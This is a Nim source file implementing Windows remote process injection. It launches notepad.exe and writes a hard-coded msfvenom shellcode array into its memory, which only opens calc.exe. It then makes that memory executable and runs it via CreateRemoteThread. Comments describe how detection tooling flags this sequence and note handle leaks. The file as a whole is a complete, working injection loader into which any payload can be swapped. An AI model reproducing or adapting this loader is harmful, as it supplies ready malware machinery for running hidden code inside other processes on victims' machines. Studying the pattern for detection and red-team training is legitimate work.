import winim/lean
#[
Basic remote process injection.
Steps:
0. CreateProcess to create a new process to inject into.
1. OpenProcess to get a handle to the remote process.
2. VirtualAllocEx to allocate memory as RW in the remote process.
3. WriteProcessMemory to write shellcode to the allocated memory.
4. VirtualProtectEx to change the memory protection to RX.
5. CreateRemoteThread to create a remote thread to execute the shellcode.
6. WaitForSingleObject to wait for the remote thread to finish executing.
]#
# msfvenom -p windows/x64/exec CMD=calc.exe -f nim
# Opaque payload bytes handed verbatim to WriteProcessMemory in `main`.
# The only documented origin is the generator command above; nothing in
# this file parses, validates or decodes the blob, and its length (276)
# is what `len(sc)` reports to the allocate/write/protect calls below.
# A plaintext, hard-coded byte array like this is a static artefact that
# file-scanning defences can match on directly.
var sc: array[276, byte] = [
  byte 0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,
  0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,
  0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,0x20,0x48,0x8b,
  0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,
  0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,
  0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,
  0x8b,0x42,0x3c,0x48,0x01,0xd0,0x8b,0x80,0x88,0x00,0x00,0x00,
  0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x50,0x8b,0x48,0x18,
  0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,0xff,0xc9,
  0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,
  0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,
  0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,
  0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b,0x0c,0x48,
  0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,0x88,0x48,
  0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,
  0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,
  0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,
  0x48,0xba,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x8d,
  0x8d,0x01,0x01,0x00,0x00,0x41,0xba,0x31,0x8b,0x6f,0x87,0xff,
  0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x41,0xba,0xa6,0x95,0xbd,0x9d,
  0xff,0xd5,0x48,0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,
  0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,0x00,0x59,0x41,
  0x89,0xda,0xff,0xd5,0x63,0x61,0x6c,0x63,0x2e,0x65,0x78,0x65,
  0x00]
proc main(): void =
  ## Entry point. Spawns a fresh notepad.exe, then pushes the module-level
  ## `sc` buffer into it with the CreateProcess -> OpenProcess ->
  ## VirtualAllocEx(RW) -> WriteProcessMemory -> VirtualProtectEx(RX) ->
  ## CreateRemoteThread -> WaitForSingleObject chain described in the
  ## module header. Every failure branch prints a message plus
  ## GetLastError() and terminates the program with `quit(1)`; there is
  ## no return value and no exception is raised.
  ##
  ## Defensive note: this exact cross-process sequence (allocate writable
  ## memory in another process, write to it, flip it executable, start a
  ## thread at that address) is the textbook remote-thread injection
  ## pattern and is what kernel-callback / ETW-based tooling typically
  ## alerts on; the parent-child relationship (this binary spawning
  ## notepad.exe) and the PROCESS_ALL_ACCESS open are additional
  ## telemetry hooks for detection.
  # Creating manually the victim process
  var si: STARTUPINFO
  var pi: PROCESS_INFORMATION
  # Win32 requires cb to hold the struct size before CreateProcess.
  si.cb = sizeof(STARTUPINFO).DWORD
  # NOTE(review): pi.hProcess and pi.hThread returned by CreateProcess are
  # never closed on any path (handle leak); pi.hProcess would also have
  # made the separate OpenProcess below unnecessary.
  if CreateProcess(nil, "notepad.exe", nil, nil, false, 0, nil, nil, addr si, addr pi) == 0:
    echo "Failed to create process"
    echo GetLastError()
    quit(1)
  var pid: DWORD = pi.dwProcessId
  echo "Created notepad.exe with PID: ", pid
  # Second handle to the child, requesting full access. A 0 handle means
  # OpenProcess failed.
  var hProcess: HANDLE = OpenProcess(PROCESS_ALL_ACCESS, 0, pid)
  echo "hProcess: ", hProcess.repr
  if hProcess == 0:
    echo "Failed to open process with pid ", pid
    echo GetLastError()
    quit(1)
  # Step 2: reserve+commit len(sc) bytes as read/write in the target.
  var allocatedMemory: LPVOID = VirtualAllocEx(hProcess, NULL, len(sc), MEM_COMMIT or MEM_RESERVE, PAGE_READWRITE)
  echo "allocatedMemory: ", allocatedMemory.repr
  if allocatedMemory == NULL:
    echo "Failed to allocate memory in remote process"
    # NOTE(review): CloseHandle's return value is silently dropped here and
    # below; this relies on winim declaring the API as discardable — confirm.
    CloseHandle(hProcess)
    echo GetLastError()
    quit(1)
  # Step 3: copy the buffer; bytesWritten is reported but never compared
  # against len(sc), so a short write would go unnoticed.
  var bytesWritten: SIZE_T = 0
  if WriteProcessMemory(hProcess, allocatedMemory, cast[LPVOID](addr sc), len(sc), addr bytesWritten) == 0:
    echo "Failed to write shellcode to remote process"
    VirtualFreeEx(hProcess, allocatedMemory, 0, MEM_RELEASE)
    CloseHandle(hProcess)
    echo GetLastError()
    quit(1)
  echo "bytesWritten: ", bytesWritten
  # Step 4: RW -> RX. oldProtect receives the previous protection and is
  # otherwise unused.
  var oldProtect: DWORD = 0
  if VirtualProtectEx(hProcess, allocatedMemory, len(sc), PAGE_EXECUTE_READ, addr oldProtect) == 0:
    echo "Failed to change memory protection in remote process"
    VirtualFreeEx(hProcess, allocatedMemory, 0, MEM_RELEASE)
    CloseHandle(hProcess)
    echo GetLastError()
    quit(1)
  echo "Changed memory protection to RX"
  # Step 5: thread entry point is the remote allocation itself; no argument
  # is passed and the thread starts immediately (flags = 0).
  var hThread: HANDLE = CreateRemoteThread(hProcess, NULL, 0, cast[LPTHREAD_START_ROUTINE](allocatedMemory), NULL, 0, NULL)
  echo "hThread: ", hThread.repr
  if hThread == 0:
    echo "Failed to create remote thread"
    VirtualFreeEx(hProcess, allocatedMemory, 0, MEM_RELEASE)
    CloseHandle(hProcess)
    echo GetLastError()
    quit(1)
  # Step 6: block until the remote thread exits; the wait result is not
  # inspected. NOTE(review): on this success path hProcess is never closed
  # and the remote allocation is never freed.
  WaitForSingleObject(hThread, INFINITE)
  CloseHandle(hThread)
when isMainModule:
  # Only run when compiled as the program itself, not when imported.
  main()